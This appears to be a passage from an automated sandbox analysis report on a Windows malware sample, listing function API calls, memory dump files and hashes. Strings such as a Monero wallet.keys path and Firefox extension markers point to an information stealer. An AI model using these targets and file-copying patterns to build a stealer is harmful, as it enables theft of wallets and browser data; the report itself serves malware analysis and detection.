                      • lstrcpyn.KERNEL32(0078AB88,0102F140,0102F140,?,0055140C,?,0102F140), ref: 00559290
                      • lstrlen.KERNEL32(?,?,0055140C,?,0102F140), ref: 005592A7
                      • wsprintfA.USER32 ref: 005592C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                      • Instruction ID: 500163c78d6353240f4ecee5eca953ff5661c5dbbb00720c7d4a87e4dac5f2b1
                      • Opcode Fuzzy Hash: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                      • Instruction Fuzzy Hash: D0011EB5540208FFDB04DFECC994EAE7BB9FB44351F108559F9098B204C639EA40DB95
                      Function 005412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                      • RegCloseKey.ADVAPI32(?), ref: 005412FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                      • Instruction ID: 64496cd3bf276e75d5650731245ab0fb3b43d498094a3344207a8784ed2141fb
                      • Opcode Fuzzy Hash: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                      • Instruction Fuzzy Hash: 4D0136B9A40208BBEB00DFE0DC49FAEB7B8EB48701F108155FA05D7280D6749A019F55
                      Function 00556630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00556663
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00556726
                      • ExitProcess.KERNEL32 ref: 00556755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                      • Instruction ID: 76d0334e3cb9ae8ef9df826022545192d81595670c63ba0d09d7774564a70188
                      • Opcode Fuzzy Hash: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                      • Instruction Fuzzy Hash: 82312FB1801219ABDB14EB50DCA5FDD7B78BF84301F40418AF61976191DF746B48CF6A
                      Function 005587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E28,00000000,?), ref: 0055882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00558836
                      • wsprintfA.USER32 ref: 00558850
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                      • Instruction ID: f27ffd1b6372606241725577f9286628833b3f6ade8cf7fff71a170a96260dd7
                      • Opcode Fuzzy Hash: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                      • Instruction Fuzzy Hash: 632103B1A40204BFEB04DFD4DD49FAEBBB8FB48711F20851AF605A7290D77D99018BA5
                      Function 00558D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                      • wsprintfW.USER32 ref: 00558D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                      • Instruction ID: 8931413a5d93e79e9bf228168f7fb1994a05517786c729212b24a77a023167f5
                      • Opcode Fuzzy Hash: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                      • Instruction Fuzzy Hash: FCE0E675A80208BBD710DB94DD09E5977B8EB44711F104155FE0997280D9755E109B66
                      Function 0054A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054A2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 0054A3FF
                      • lstrlen.KERNEL32(00000000), ref: 0054A6BC
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 0054A743
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                      • Instruction ID: f727ed7e75c65934af3fc6f130f2f1465cfa966cd4508246718fd0363928680b
                      • Opcode Fuzzy Hash: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                      • Instruction Fuzzy Hash: 6EE105728101199BDB04FBA4DCA9EEE7738BF94301F50825AF91772091EF346A4DCB66
                      Function 0054D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D481
                      • lstrlen.KERNEL32(00000000), ref: 0054D698
                      • lstrlen.KERNEL32(00000000), ref: 0054D6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 0054D72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                      • Instruction ID: bb55c24b0563f19868464467eb3b8617c289e58c8a48576a330db8ca67d68301
                      • Opcode Fuzzy Hash: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                      • Instruction Fuzzy Hash: 7E91F3729101199BDB04FBA4DC6ADEE7B38BF94301F50825AF90766091EF346A0DCB66
                      Function 0054D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D801
                      • lstrlen.KERNEL32(00000000), ref: 0054D99F
                      • lstrlen.KERNEL32(00000000), ref: 0054D9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 0054DA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                      • Instruction ID: 90d356ce6535db78ddb3e5459bf64d55bb91af62d0eb9e9704fdaf298da1c2e4
                      • Opcode Fuzzy Hash: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                      • Instruction Fuzzy Hash: 0581E3729101199BDB04FBA4DC6ADEE7B38BF94301F50461AF907A6091FF346A0DCB66
                      Function 0054F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00561580,00560D92), ref: 0054F54C
                      • lstrlen.KERNEL32(00000000), ref: 0054F56B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                      • Instruction ID: 69d75cf741c8010d092ac5da7bc7713bcca57574e9c3c40cf811166c58df3f1e
                      • Opcode Fuzzy Hash: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                      • Instruction Fuzzy Hash: AD51F371D10109AADB04FBA4DC6ADED7B78BF94301F408629FC1667195EE346A0DCBA2
                      Function 00553560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
